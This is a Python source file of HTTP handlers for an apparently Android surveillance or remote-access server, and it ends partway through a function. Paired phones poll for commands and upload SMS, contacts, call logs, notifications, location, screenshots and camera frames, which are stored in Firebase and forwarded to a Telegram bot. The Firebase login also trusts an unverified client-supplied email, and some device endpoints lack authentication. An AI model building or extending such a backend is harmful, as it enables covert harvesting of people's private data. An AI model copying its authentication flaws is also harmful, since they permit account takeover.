     1→"""
     2→API Handlers - All HTTP/WebSocket request handlers for the Abu-Zahra Server.
     3→Architecture: Client → Server ← {Web Dashboard, Admin App, Telegram Bot}
     4→"""
     5→
     6→import json
     7→import time
     8→import uuid
     9→import base64
    10→import asyncio
    11→import logging
    12→from aiohttp import web, WSMsgType
    13→from datetime import datetime
    14→
    15→from .config import (
    16→    CORS_ORIGINS, VERSION, SERVER_DOMAIN, SERVER_URL,
    17→    MAX_UPLOAD_SIZE, JPEG_STREAM_INTERVAL, STREAM_FRAME_CACHE_SIZE
    18→)
    19→from .store import store
    20→from .commands import COMMAND_REGISTRY, CMD_CATEGORIES, get_all_categories
    21→from . import firebase_client as _fb
    22→from .firebase_client import (
    23→    push_command, store_sms, store_contacts,
    24→    store_calls, store_notifications, store_device_info, store_location
    25→)
    26→from .file_storage import save_upload, save_base64_upload, get_file, get_storage_stats
    27→from .telegram_bot import forward_result
    28→
    29→logger = logging.getLogger("api")
    30→
    31→
    32→# ─── Middleware ────────────────────────────────────────────────
    33→
    34→@web.middleware
    35→async def cors_middleware(request: web.Request, handler):
    36→    if request.method == 'OPTIONS':
    37→        resp = web.Response(status=204)
    38→    else:
    39→        resp = await handler(request)
    40→    
    41→    origin = request.headers.get('Origin', '')
    42→    if origin in CORS_ORIGINS or origin == '':
    43→        resp.headers['Access-Control-Allow-Origin'] = origin or CORS_ORIGINS[0]
    44→    resp.headers['Access-Control-Allow-Methods'] = 'GET, POST, PUT, DELETE, OPTIONS'
    45→    resp.headers['Access-Control-Allow-Headers'] = 'Content-Type, Authorization, X-Device-Token'
    46→    resp.headers['Access-Control-Max-Age'] = '86400'
    47→    return resp
    48→
    49→
    50→def get_auth_session(request: web.Request):
    51→    """Extract and validate session from Authorization header."""
    52→    auth = request.headers.get('Authorization', '')
    53→    if not auth.startswith('Bearer '):
    54→        return None
    55→    token = auth[7:]
    56→    return store.validate_session(token)
    57→
    58→
    59→def get_device_auth(request: web.Request):
    60→    """Extract device_id and validate device token."""
    61→    device_id = request.match_info.get('device_id') or request.query.get('device_id', '')
    62→    token = request.headers.get('X-Device-Token', '')
    63→    if not device_id or not token:
    64→        return None, "Missing device_id or token"
    65→    if not store.validate_device_token(device_id, token):
    66→        return None, "Invalid device token"
    67→    return device_id, None
    68→
    69→
    70→def json_response(data: any, status: int = 200) -> web.Response:
    71→    return web.Response(
    72→        text=json.dumps(data, ensure_ascii=False, default=str),
    73→        content_type='application/json',
    74→        status=status
    75→    )
    76→
    77→
    78→# ─── Public Endpoints ─────────────────────────────────────────
    79→
    80→async def api_health(request: web.Request) -> web.Response:
    81→    store.api_hits += 1
    82→    return json_response({
    83→        "ok": True,
    84→        "status": "running",
    85→        "version": VERSION,
    86→        "firebase": _fb.firebase_connected,
    87→        "uptime": int(time.time() - store.start_time),
    88→        "devices": len(store.devices),
    89→        "commands": len(store.commands),
    90→    })
    91→
    92→
    93→async def api_login(request: web.Request) -> web.Response:
    94→    """Web/Admin login. Accepts username/email + password."""
    95→    store.api_hits += 1
    96→    try:
    97→        body = await request.json()
    98→    except:
    99→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   100→    
   101→    username_or_email = body.get('username', '').strip()
   102→    password = body.get('password', '')
   103→    
   104→    if not username_or_email or not password:
   105→        return json_response({"ok": False, "message": "Missing username or password"}, 400)
   106→    
   107→    user = await store.authenticate_user(username_or_email, password)
   108→    if not user:
   109→        return json_response({"ok": False, "message": "اسم المستخدم أو كلمة المرور غير صحيحة"}, 401)
   110→    
   111→    # Create session
   112→    ip = request.remote or ""
   113→    ua = request.headers.get('User-Agent', '')
   114→    session = store.create_session(user['id'], user['username'], user['role'], ip, ua, source="web")
   115→    
   116→    await store.add_event("auth", f"User logged in: {user['username']} (web)", "success", user_id=user['id'])
   117→    
   118→    # Get or create permanent link code
   119→    permanent_code = await store.get_or_create_permanent_code(user['id'])
   120→
   121→    # Sync to Firebase
   122→    if _fb.firebase_connected:
   123→        from .firebase_client import sync_permanent_code
   124→        await sync_permanent_code(user['email'], permanent_code, user['id'])
   125→
   126→    return json_response({
   127→        "ok": True,
   128→        "success": True,
   129→        "token": session['token'],
   130→        "expires_at": session['expires_at'],
   131→        "user_id": user['id'],
   132→        "username": user['username'],
   133→        "role": user['role'],
   134→        "email": user['email'],
   135→        "permanent_code": permanent_code,
   136→        "message": "تم تسجيل الدخول بنجاح"
   137→    })
   138→
   139→
   140→async def api_firebase_auth(request: web.Request) -> web.Response:
   141→    """Firebase authentication. Accepts Firebase ID token from Google Sign-In."""
   142→    store.api_hits += 1
   143→    try:
   144→        body = await request.json()
   145→    except:
   146→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   147→    
   148→    firebase_token = body.get('firebase_token', '').strip()
   149→    id_token = body.get('id_token', '').strip()
   150→    email = body.get('email', '').strip().lower()
   151→    display_name = body.get('display_name', '').strip()
   152→    
   153→    # Accept either firebase_token or id_token
   154→    token = firebase_token or id_token
   155→    
   156→    if not email:
   157→        return json_response({"ok": False, "message": "البريد الإلكتروني مطلوب"}, 400)
   158→    
   159→    # Try to verify Firebase token if available
   160→    verified_email = None
   161→    verified_name = None
   162→    if token and _fb.firebase_connected:
   163→        try:
   164→            import requests
   165→            # Verify with Firebase Auth REST API
   166→            resp = requests.get(
   167→                f"https://identitytoolkit.googleapis.com/v1/accounts:lookup?key={token}",
   168→                timeout=5
   169→            )
   170→            if resp.status_code == 200:
   171→                data = resp.json()
   172→                if data.get('users'):
   173→                    user_info = data['users'][0]
   174→                    verified_email = user_info.get('email', '').lower()
   175→                    verified_name = user_info.get('displayName', '') or user_info.get('localId', '')
   176→        except Exception as e:
   177→            logger.warning(f"Firebase token verification failed: {e}")
   178→    
   179→    # Use verified email if available, otherwise trust the provided email
   180→    final_email = verified_email or email
   181→    final_name = verified_name or display_name or final_email.split('@')[0]
   182→    
   183→    # Find or create user
   184→    user = None
   185→    for u in store.users.values():
   186→        if u['email'] == final_email:
   187→            user = u
   188→            break
   189→    
   190→    if not user:
   191→        # Auto-create user from Firebase auth
   192→        try:
   193→            username = final_name.replace(' ', '_').replace('@', '_')[:20]
   194→            # Ensure unique username
   195→            base_username = username
   196→            counter = 1
   197→            while any(u['username'] == username for u in store.users.values()):
   198→                username = f"{base_username}_{counter}"
   199→                counter += 1
   200→            
   201→            user = await store.create_user(
   202→                email=final_email,
   203→                username=username,
   204→                password=str(uuid.uuid4()),  # Random password for Firebase users
   205→                role="user"
   206→            )
   207→            logger.info(f"Auto-created user from Firebase: {username} ({final_email})")
   208→        except ValueError as e:
   209→            return json_response({"ok": False, "message": str(e)}, 400)
   210→    
   211→    if not user.get('is_active', True):
   212→        return json_response({"ok": False, "message": "الحساب معطل"}, 403)
   213→    
   214→    # Create session
   215→    ip = request.remote or ""
   216→    ua = request.headers.get('User-Agent', '')
   217→    session = store.create_session(user['id'], user['username'], user['role'], ip, ua, source="firebase")
   218→    
   219→    await store.add_event("auth", f"User logged in via Firebase: {user['username']} ({final_email})", "success", user_id=user['id'])
   220→    
   221→    # Get or create permanent link code
   222→    permanent_code = await store.get_or_create_permanent_code(user['id'])
   223→    
   224→    # Sync to Firebase
   225→    if _fb.firebase_connected:
   226→        try:
   227→            from .firebase_client import sync_permanent_code
   228→            await sync_permanent_code(user['email'], permanent_code, user['id'])
   229→        except:
   230→            pass
   231→
   232→    return json_response({
   233→        "ok": True,
   234→        "success": True,
   235→        "token": session['token'],
   236→        "expires_at": session['expires_at'],
   237→        "user_id": user['id'],
   238→        "username": user['username'],
   239→        "role": user['role'],
   240→        "email": user['email'],
   241→        "permanent_code": permanent_code,
   242→        "message": "تم تسجيل الدخول بنجاح"
   243→    })
   244→
   245→
   246→async def api_web_register(request: web.Request) -> web.Response:
   247→    """Register a new user account."""
   248→    store.api_hits += 1
   249→    try:
   250→        body = await request.json()
   251→    except:
   252→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   253→    
   254→    email = body.get('email', '').strip()
   255→    username = body.get('username', '').strip()
   256→    password = body.get('password', '').strip()
   257→    
   258→    if not email or not username or not password:
   259→        return json_response({"ok": False, "message": "جميع الحقول مطلوبة"}, 400)
   260→    
   261→    if len(password) < 6:
   262→        return json_response({"ok": False, "message": "كلمة المرور يجب أن تكون 6 أحرف على الأقل"}, 400)
   263→    
   264→    if '@' not in email:
   265→        return json_response({"ok": False, "message": "بريد إلكتروني غير صالح"}, 400)
   266→    
   267→    try:
   268→        user = await store.create_user(email=email, username=username, password=password, role="user")
   269→    except ValueError as e:
   270→        return json_response({"ok": False, "message": str(e)}, 400)
   271→    
   272→    # Auto-login after registration
   273→    ip = request.remote or ""
   274→    ua = request.headers.get('User-Agent', '')
   275→    session = store.create_session(user['id'], user['username'], user['role'], ip, ua, source="register")
   276→    
   277→    await store.add_event("auth", f"New user registered: {username} ({email})", "success", user_id=user['id'])
   278→    
   279→    # Get permanent code
   280→    permanent_code = await store.get_or_create_permanent_code(user['id'])
   281→    
   282→    if _fb.firebase_connected:
   283→        try:
   284→            from .firebase_client import sync_permanent_code
   285→            await sync_permanent_code(user['email'], permanent_code, user['id'])
   286→        except:
   287→            pass
   288→    
   289→    return json_response({
   290→        "ok": True,
   291→        "success": True,
   292→        "token": session['token'],
   293→        "expires_at": session['expires_at'],
   294→        "user_id": user['id'],
   295→        "username": user['username'],
   296→        "role": user['role'],
   297→        "email": user['email'],
   298→        "permanent_code": permanent_code,
   299→        "message": "تم إنشاء الحساب بنجاح"
   300→    })
   301→
   302→
   303→# ─── Device API (authenticated by device token) ───────────────
   304→
   305→async def api_register(request: web.Request) -> web.Response:
   306→    """Device registration using pairing code."""""
   307→    store.api_hits += 1
   308→    try:
   309→        body = await request.json()
   310→    except:
   311→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   312→    
   313→    device_id = body.get('device_id', '')
   314→    link_code = body.get('link_code', '')
   315→    device_token = body.get('device_token', '') or body.get('token', '')
   316→    model = body.get('device_model', '') or body.get('model', '')
   317→    brand = body.get('brand', '')
   318→    os_version = body.get('os_version', '') or body.get('android', '')
   319→    
   320→    if not device_id or not link_code:
   321→        return json_response({"ok": False, "message": "Missing device_id or link_code"}, 400)
   322→    
   323→    # Verify pairing code
   324→    code_data = await store.verify_pairing_code(link_code)
   325→    if not code_data:
   326→        return json_response({"ok": False, "message": "كود الربط غير صالح أو منتهي الصلاحية"}, 400)
   327→    
   328→    # Register device
   329→    device = await store.register_device(
   330→        device_id=device_id,
   331→        token=device_token,
   332→        pairing_code=link_code,
   333→        model=model,
   334→        brand=brand,
   335→        os_version=os_version,
   336→        user_id=code_data.get('user_id'),
   337→    )
   338→    
   339→    if not device:
   340→        return json_response({"ok": False, "message": "فشل تسجيل الجهاز"}, 500)
   341→    
   342→    return json_response({
   343→        "ok": True,
   344→        "success": True,
   345→        "device_id": device_id,
   346→        "device_token": device_token,
   347→        "server_domain": SERVER_DOMAIN,
   348→        "message": "تم تسجيل الجهاز بنجاح"
   349→    })
   350→
   351→
   352→async def api_get_commands(request: web.Request) -> web.Response:
   353→    """Device fetches pending commands."""
   354→    device_id, error = get_device_auth(request)
   355→    if error:
   356→        return json_response({"ok": False, "message": error}, 401)
   357→    
   358→    commands = await store.get_pending_commands(device_id)
   359→    
   360→    # Mark as sent
   361→    for cmd in commands:
   362→        cmd['sent_at'] = datetime.utcnow().isoformat()
   363→    
   364→    return json_response({
   365→        "ok": True,
   366→        "commands": commands,
   367→        "count": len(commands),
   368→        "server_time": datetime.utcnow().isoformat(),
   369→    })
   370→
   371→
   372→async def api_command_result(request: web.Request) -> web.Response:
   373→    """Device submits command result."""
   374→    store.api_hits += 1
   375→    command_id = request.match_info.get('command_id', '')
   376→    device_id, error = get_device_auth(request)
   377→    if error:
   378→        return json_response({"ok": False, "message": error}, 401)
   379→    
   380→    try:
   381→        body = await request.json()
   382→    except:
   383→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   384→    
   385→    status = body.get('status', 'completed')
   386→    result = body.get('result', '')
   387→    
   388→    updated = await store.update_command_result(command_id, status, result)
   389→    
   390→    # Forward result to Telegram if pending
   391→    if updated and command_id in store.pending_messages:
   392→        await forward_result(command_id, result)
   393→    
   394→    # Store text data in Firebase
   395→    if updated and isinstance(result, str) and len(result) < 50000:
   396→        cmd = store.commands.get(command_id, {})
   397→        cmd_name = cmd.get('command', '')
   398→        
   399→        if cmd_name in ('get_sms',):
   400→            await store_sms(device_id, json.loads(result) if result.startswith('[') else result)
   401→        elif cmd_name in ('get_contacts',):
   402→            await store_contacts(device_id, json.loads(result) if result.startswith('[') else result)
   403→        elif cmd_name in ('get_calls',):
   404→            await store_calls(device_id, json.loads(result) if result.startswith('[') else result)
   405→        elif cmd_name in ('get_notifications',):
   406→            await store_notifications(device_id, json.loads(result) if result.startswith('[') else result)
   407→        elif cmd_name in ('get_location',):
   408→            await store_location(device_id, json.loads(result) if result.startswith('{') else result)
   409→        elif cmd_name in ('get_info', 'get_battery', 'get_wifi_info', 'get_network_info',
   410→                          'get_sim_info', 'get_storage_info'):
   411→            await store_device_info(device_id, json.loads(result) if result.startswith('{') else {"raw": result})
   412→    
   413→    # Handle base64 image results - save as temp file
   414→    if updated and isinstance(result, str) and len(result) > 10000 and result.startswith('/9j/'):
   415→        try:
   416→            img_bytes = base64.b64decode(result)
   417→            await save_upload(device_id, img_bytes, f"screenshot_{command_id}.jpg",
   418→                            file_type="screenshot", command_id=command_id)
   419→            # Cache for streaming
   420→            store.latest_frames[f"{device_id}:video"] = {
   421→                "data": result,
   422→                "timestamp": time.time(),
   423→                "source": "screenshot",
   424→            }
   425→        except Exception as e:
   426→            logger.error(f"Failed to save screenshot: {e}")
   427→    
   428→    return json_response({"ok": True, "success": True, "message": "Result received"})
   429→
   430→
   431→async def api_device_data(request: web.Request) -> web.Response:
   432→    """Device sends typed data (location, battery, events, etc.)."""
   433→    device_id, error = get_device_auth(request)
   434→    if error:
   435→        return json_response({"ok": False, "message": error}, 401)
   436→    
   437→    try:
   438→        body = await request.json()
   439→    except:
   440→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   441→    
   442→    data_type = body.get('type', '')
   443→    data = body.get('data', {})
   444→    command = body.get('command', '')
   445→    
   446→    # Store in Firebase for text data
   447→    if data_type == 'location' and data:
   448→        await store_location(device_id, data)
   449→    elif data_type == 'sms' and data:
   450→        await store_sms(device_id, data if isinstance(data, list) else [data])
   451→    elif data_type == 'contacts' and data:
   452→        await store_contacts(device_id, data if isinstance(data, list) else [data])
   453→    elif data_type == 'calls' and data:
   454→        await store_calls(device_id, data if isinstance(data, list) else [data])
   455→    elif data_type == 'notifications' and data:
   456→        await store_notifications(device_id, data if isinstance(data, list) else [data])
   457→    elif data_type == 'device_info' and data:
   458→        await store_device_info(device_id, data)
   459→    
   460→    # Update device info
   461→    if data_type == 'location' and isinstance(data, dict):
   462→        await store.update_device(device_id, {"location": data})
   463→    elif data_type == 'battery' and isinstance(data, (int, float)):
   464→        await store.update_device(device_id, {"battery": data})
   465→    
   466→    return json_response({"ok": True, "success": True, "message": "Data stored"})
   467→
   468→
   469→async def api_heartbeat(request: web.Request) -> web.Response:
   470→    """Device heartbeat."""
   471→    store.api_hits += 1
   472→    try:
   473→        body = await request.json()
   474→    except:
   475→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   476→    
   477→    device_id = body.get('device_id', '')
   478→    status = body.get('status', 'online')
   479→    battery = body.get('battery')
   480→    
   481→    if not device_id:
   482→        return json_response({"ok": False, "message": "Missing device_id"}, 400)
   483→    
   484→    await store.update_heartbeat(device_id, status, battery)
   485→    
   486→    return json_response({"ok": True, "success": True, "message": "Heartbeat received"})
   487→
   488→
   489→async def api_device_event(request: web.Request) -> web.Response:
   490→    """Device sends events."""
   491→    device_id, error = get_device_auth(request)
   492→    if error:
   493→        return json_response({"ok": False, "message": error}, 401)
   494→    
   495→    try:
   496→        body = await request.json()
   497→    except:
   498→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   499→    
   500→    event_type = body.get('event_type', '')
   501→    data = body.get('data', {})
   502→    
   503→    await store.add_event("device", str(data)[:200], "info", device_id=device_id, details=event_type)
   504→    
   505→    return json_response({"ok": True, "stored": True})
   506→
   507→
   508→async def api_upload_file(request: web.Request) -> web.Response:
   509→    """Multipart file upload."""
   510→    store.api_hits += 1
   511→    
   512→    # Get device_id from form or IP map
   513→    device_id = None
   514→    token = request.headers.get('X-Device-Token', '')
   515→    
   516→    try:
   517→        reader = await request.multipart()
   518→        fields = {}
   519→        file_data = None
   520→        filename = ""
   521→        
   522→        async for field in reader:
   523→            if field.name == 'file':
   524→                file_data = await field.read(decode=False)
   525→                filename = field.filename or "unknown"
   526→            else:
   527→                fields[field.name] = (await field.read(decode=True)).decode('utf-8', errors='replace')
   528→        
   529→        device_id = fields.get('device_id', '')
   530→        if not device_id:
   531→            device_id = store._ip_device_map.get(request.remote, '')
   532→        
   533→        if not device_id:
   534→            return json_response({"ok": False, "message": "Unknown device"}, 400)
   535→        
   536→        file_type = fields.get('file_type', 'file')
   537→        command_id = fields.get('command_id', '')
   538→        caption = fields.get('caption', '')
   539→        
   540→        if not file_data:
   541→            return json_response({"ok": False, "message": "No file data"}, 400)
   542→        
   543→        if len(file_data) > MAX_UPLOAD_SIZE:
   544→            return json_response({"ok": False, "message": "File too large"}, 413)
   545→        
   546→        file_meta = await save_upload(device_id, file_data, filename, file_type, command_id, caption)
   547→        
   548→        return json_response({
   549→            "ok": True,
   550→            "file_id": file_meta['id'],
   551→            "file_name": filename,
   552→            "file_size": len(file_data),
   553→        })
   554→    except Exception as e:
   555→        logger.error(f"Upload error: {e}")
   556→        return json_response({"ok": False, "message": str(e)}, 500)
   557→
   558→
   559→async def api_upload_base64(request: web.Request) -> web.Response:
   560→    """Base64 file upload."""
   561→    store.api_hits += 1
   562→    device_id, error = get_device_auth(request)
   563→    if error:
   564→        return json_response({"ok": False, "message": error}, 401)
   565→    
   566→    try:
   567→        body = await request.json()
   568→    except:
   569→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   570→    
   571→    base64_data = body.get('base64_data', '')
   572→    filename = body.get('filename', 'upload.jpg')
   573→    file_type = body.get('file_type', 'file')
   574→    command_id = body.get('command_id', '')
   575→    caption = body.get('caption', '')
   576→    
   577→    if not base64_data:
   578→        return json_response({"ok": False, "message": "No base64 data"}, 400)
   579→    
   580→    try:
   581→        file_meta = await save_base64_upload(device_id, base64_data, filename, file_type, command_id, caption)
   582→        
   583→        # Cache images for streaming viewer
   584→        if file_type in ('photo', 'screenshot', 'camera') and base64_data.startswith('/9j/'):
   585→            store.latest_frames[f"{device_id}:video"] = {
   586→                "data": base64_data,
   587→                "timestamp": time.time(),
   588→                "source": file_type,
   589→            }
   590→        
   591→        return json_response({
   592→            "ok": True,
   593→            "file_id": file_meta['id'],
   594→            "file_name": filename,
   595→        })
   596→    except ValueError as e:
   597→        return json_response({"ok": False, "message": str(e)}, 400)
   598→    except Exception as e:
   599→        return json_response({"ok": False, "message": str(e)}, 500)
   600→
   601→
   602→async def api_download_file(request: web.Request) -> web.Response:
   603→    """Download a file by file_id."""
   604→    file_id = request.match_info.get('file_id', '')
   605→    session = get_auth_session(request)
   606→    
   607→    if not session:
   608→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   609→    
   610→    data, meta = await get_file(file_id)
   611→    if not data:
   612→        return json_response({"ok": False, "message": "File not found or expired"}, 404)
   613→    
   614→    content_type = {
   615→        'photo': 'image/jpeg', 'screenshot': 'image/jpeg', 'camera': 'image/jpeg',
   616→        'video': 'video/mp4', 'audio': 'audio/mpeg', 'file': 'application/octet-stream'
   617→    }.get(meta.get('file_type', ''), 'application/octet-stream')
   618→    
   619→    return web.Response(
   620→        body=data,
   621→        content_type=content_type,
   622→        headers={
   623→            'Content-Disposition': f'attachment; filename="{meta["filename"]}"',
   624→            'Content-Length': str(len(data)),
   625→        }
   626→    )
   627→
   628→
   629→async def api_device_settings(request: web.Request) -> web.Response:
   630→    """Device fetches settings."""
   631→    device_id = request.match_info.get('device_id', '')
   632→    return json_response({
   633→        "ok": True,
   634→        "settings": {
   635→            "sync_interval": store.settings.get('sync_interval', 15),
   636→            "location_interval": store.settings.get('location_interval', 300),
   637→            "auto_location": store.settings.get('auto_location', False),
   638→            "auto_sync": store.settings.get('auto_sync', True),
   639→        }
   640→    })
   641→
   642→
   643→# ─── Authenticated Web/Admin API ──────────────────────────────
   644→
   645→async def api_web_devices(request: web.Request) -> web.Response:
   646→    session = get_auth_session(request)
   647→    if not session:
   648→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   649→    
   650→    devices = await store.get_user_devices(session['user_id'])
   651→    # Add online status
   652→    result = []
   653→    for d in devices:
   654→        dev = dict(d)
   655→        dev['online'] = store._device_last_online.get(d['id'], False)
   656→        result.append(dev)
   657→    
   658→    return json_response({"ok": True, "devices": result})
   659→
   660→
   661→async def api_web_device_detail(request: web.Request) -> web.Response:
   662→    session = get_auth_session(request)
   663→    if not session:
   664→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   665→    
   666→    device_id = request.match_info.get('device_id', '')
   667→    device = await store.get_user_device(session['user_id'], device_id)
   668→    if not device:
   669→        return json_response({"ok": False, "message": "Device not found"}, 404)
   670→    
   671→    dev = dict(device)
   672→    dev['online'] = store._device_last_online.get(device_id, False)
   673→    commands = await store.get_commands_history(device_id, limit=20)
   674→    
   675→    return json_response({"ok": True, "device": dev, "commands": commands})
   676→
   677→
   678→async def api_web_commands(request: web.Request) -> web.Response:
   679→    session = get_auth_session(request)
   680→    if not session:
   681→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   682→    
   683→    commands = await store.get_commands_history(limit=100)
   684→    return json_response({"ok": True, "commands": commands})
   685→
   686→
   687→async def api_web_events(request: web.Request) -> web.Response:
   688→    session = get_auth_session(request)
   689→    if not session:
   690→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   691→    
   692→    device_id = request.query.get('device_id', '')
   693→    event_type = request.query.get('type', '')
   694→    events = await store.get_events(device_id=device_id or None, event_type=event_type or None, limit=100)
   695→    return json_response({"ok": True, "events": events})
   696→
   697→
   698→async def api_web_stats(request: web.Request) -> web.Response:
   699→    session = get_auth_session(request)
   700→    if not session:
   701→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   702→    
   703→    stats = store.get_stats()
   704→    stats['storage'] = get_storage_stats()
   705→    return json_response({"ok": True, "stats": stats})
   706→
   707→
   708→async def api_web_send_command(request: web.Request) -> web.Response:
   709→    session = get_auth_session(request)
   710→    if not session:
   711→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   712→    
   713→    try:
   714→        body = await request.json()
   715→    except:
   716→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   717→    
   718→    device_id = body.get('device_id', '')
   719→    command = body.get('command', '')
   720→    params = body.get('params', {})
   721→    
   722→    if not device_id or not command:
   723→        return json_response({"ok": False, "message": "Missing device_id or command"}, 400)
   724→    
   725→    # Check device ownership
   726→    device = await store.get_user_device(session['user_id'], device_id)
   727→    if not device:
   728→        return json_response({"ok": False, "message": "Device not found or access denied"}, 404)
   729→    
   730→    # Look up the actual command
   731→    cmd_def = COMMAND_REGISTRY.get(command, {})
   732→    actual_cmd = cmd_def.get('cmd', command)
   733→    actual_params = cmd_def.get('params', {})
   734→    if params:
   735→        actual_params.update(params)
   736→    
   737→    # Rate limit
   738→    if not store.check_rate_limit(f"cmd_{session['user_id']}", 20, 60):
   739→        return json_response({"ok": False, "message": "Rate limited"}, 429)
   740→    
   741→    # Queue command
   742→    queued = await store.queue_command(
   743→        device_id=device_id,
   744→        command=actual_cmd,
   745→        params=actual_params,
   746→        requested_by=session['user_id'],
   747→        source="web"
   748→    )
   749→    
   750→    # Push to Firebase
   751→    if _fb.firebase_connected:
   752→        await push_command(device_id, {
   753→            "id": queued['id'],
   754→            "command": actual_cmd,
   755→            "params": actual_params,
   756→            "created_at": queued['created_at'],
   757→        })
   758→    
   759→    await store.add_event("command", f"Command queued: {actual_cmd} -> {device_id}",
   760→                         "info", device_id=device_id, user_id=session['user_id'])
   761→    
   762→    return json_response({"ok": True, "command": queued})
   763→
   764→
   765→async def api_web_link_code(request: web.Request) -> web.Response:
   766→    session = get_auth_session(request)
   767→    if not session:
   768→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   769→    
   770→    code_data = store.generate_pairing_code(session['user_id'])
   771→    return json_response({"ok": True, "code": code_data['code'], "session_id": code_data['session_id']})
   772→
   773→
   774→async def api_web_settings_get(request: web.Request) -> web.Response:
   775→    session = get_auth_session(request)
   776→    if not session:
   777→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   778→    
   779→    return json_response({"ok": True, "settings": store.settings})
   780→
   781→
   782→async def api_web_settings_set(request: web.Request) -> web.Response:
   783→    session = get_auth_session(request)
   784→    if not session:
   785→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   786→    
   787→    if session['role'] != 'admin':
   788→        return json_response({"ok": False, "message": "Admin only"}, 403)
   789→    
   790→    try:
   791→        body = await request.json()
   792→    except:
   793→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   794→    
   795→    store.settings.update(body)
   796→    await _save_json("settings.json", store.settings)
   797→    
   798→    return json_response({"ok": True})
   799→
   800→
   801→async def api_web_unlink(request: web.Request) -> web.Response:
   802→    session = get_auth_session(request)
   803→    if not session:
   804→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   805→    
   806→    device_id = request.match_info.get('device_id', '')
   807→    success = await store.unlink_device(device_id, session['user_id'])
   808→    
   809→    if success:
   810→        return json_response({"ok": True})
   811→    return json_response({"ok": False, "message": "Device not found"}, 404)
   812→
   813→
   814→async def api_web_logout(request: web.Request) -> web.Response:
   815→    session = get_auth_session(request)
   816→    if not session:
   817→        return json_response({"ok": False, "message": "Not logged in"}, 401)
   818→    
   819→    token = request.headers.get('Authorization', '').replace('Bearer ', '')
   820→    if token in store.sessions:
   821→        del store.sessions[token]
   822→    
   823→    return json_response({"ok": True})
   824→
   825→
   826→async def _save_json(name, data):
   827→    from .store import _save_json as _sj
   828→    await _sj(name, data)
   829→
   830→
   831→# ─── User Management API (Admin) ──────────────────────────────
   832→
   833→async def api_web_users(request: web.Request) -> web.Response:
   834→    session = get_auth_session(request)
   835→    if not session or session['role'] != 'admin':
   836→        return json_response({"ok": False, "message": "Admin only"}, 403)
   837→    
   838→    users = await store.list_users()
   839→    # Remove password hashes from response
   840→    safe_users = []
   841→    for u in users:
   842→        safe = dict(u)
   843→        safe.pop('password_hash', None)
   844→        safe_users.append(safe)
   845→    
   846→    return json_response({"ok": True, "users": safe_users})
   847→
   848→
   849→async def api_web_create_user(request: web.Request) -> web.Response:
   850→    session = get_auth_session(request)
   851→    if not session or session['role'] != 'admin':
   852→        return json_response({"ok": False, "message": "Admin only"}, 403)
   853→    
   854→    try:
   855→        body = await request.json()
   856→    except:
   857→        return json_response({"ok": False, "message": "Invalid JSON"}, 400)
   858→    
   859→    email = body.get('email', '')
   860→    username = body.get('username', '')
   861→    password = body.get('password', '')
   862→    role = body.get('role', 'user')
   863→    
   864→    if not email or not username or not password:
   865→        return json_response({"ok": False, "message": "Missing required fields"}, 400)
   866→    
   867→    try:
   868→        user = await store.create_user(email, username, password, role)
   869→        safe = dict(user)
   870→        safe.pop('password_hash', None)
   871→        return json_response({"ok": True, "user": safe})
   872→    except ValueError as e:
   873→        return json_response({"ok": False, "message": str(e)}, 400)
   874→
   875→
   876→async def api_web_delete_user(request: web.Request) -> web.Response:
   877→    session = get_auth_session(request)
   878→    if not session or session['role'] != 'admin':
   879→        return json_response({"ok": False, "message": "Admin only"}, 403)
   880→    
   881→    user_id = request.match_info.get('user_id', '')
   882→    if user_id == session['user_id']:
   883→        return json_response({"ok": False, "message": "Cannot delete yourself"}, 400)
   884→    
   885→    success = await store.delete_user(user_id)
   886→    if success:
   887→        return json_response({"ok": True})
   888→    return json_response({"ok": False, "message": "User not found"}, 404)
   889→
   890→
   891→async def api_web_regenerate_code(request: web.Request) -> web.Response:
   892→    session = get_auth_session(request)
   893→    if not session:
   894→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   895→    new_code = await store.regenerate_permanent_code(session['user_id'])
   896→    if _fb.firebase_connected:
   897→        from .firebase_client import sync_permanent_code
   898→        user = await store.get_user(session['user_id'])
   899→        if user:
   900→            await sync_permanent_code(user['email'], new_code, session['user_id'])
   901→    return json_response({"ok": True, "code": new_code})
   902→
   903→
   904→# ─── File Management API ──────────────────────────────────────
   905→
   906→async def api_web_files(request: web.Request) -> web.Response:
   907→    session = get_auth_session(request)
   908→    if not session:
   909→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   910→    
   911→    device_id = request.query.get('device_id', '')
   912→    
   913→    # List active files for the user's devices
   914→    files = []
   915→    for fid, fmeta in store.files.items():
   916→        if device_id and fmeta.get('device_id') != device_id:
   917→            continue
   918→        # Check ownership
   919→        device = store.devices.get(fmeta.get('device_id', ''))
   920→        if device and (session['role'] == 'admin' or device.get('owner_id') == session['user_id']):
   921→            safe = dict(fmeta)
   922→            safe.pop('path', None)
   923→            files.append(safe)
   924→    
   925→    return json_response({"ok": True, "files": files})
   926→
   927→
   928→async def api_web_list_files_device(request: web.Request) -> web.Response:
   929→    """Send list_files command to device and return result."""
   930→    session = get_auth_session(request)
   931→    if not session:
   932→        return json_response({"ok": False, "message": "Unauthorized"}, 401)
   933→    
   934→    device_id = request.query.get('device_id', '')
   935→    path = request.query.get('path', '/storage/emulated/0/')
   936→    
   937→    if not device_id:
   938→        return json_response({"ok": False, "message": "Missing device_id"}, 400)
   939→    
   940→    device = await store.get_user_device(session['user_id'], device_id)
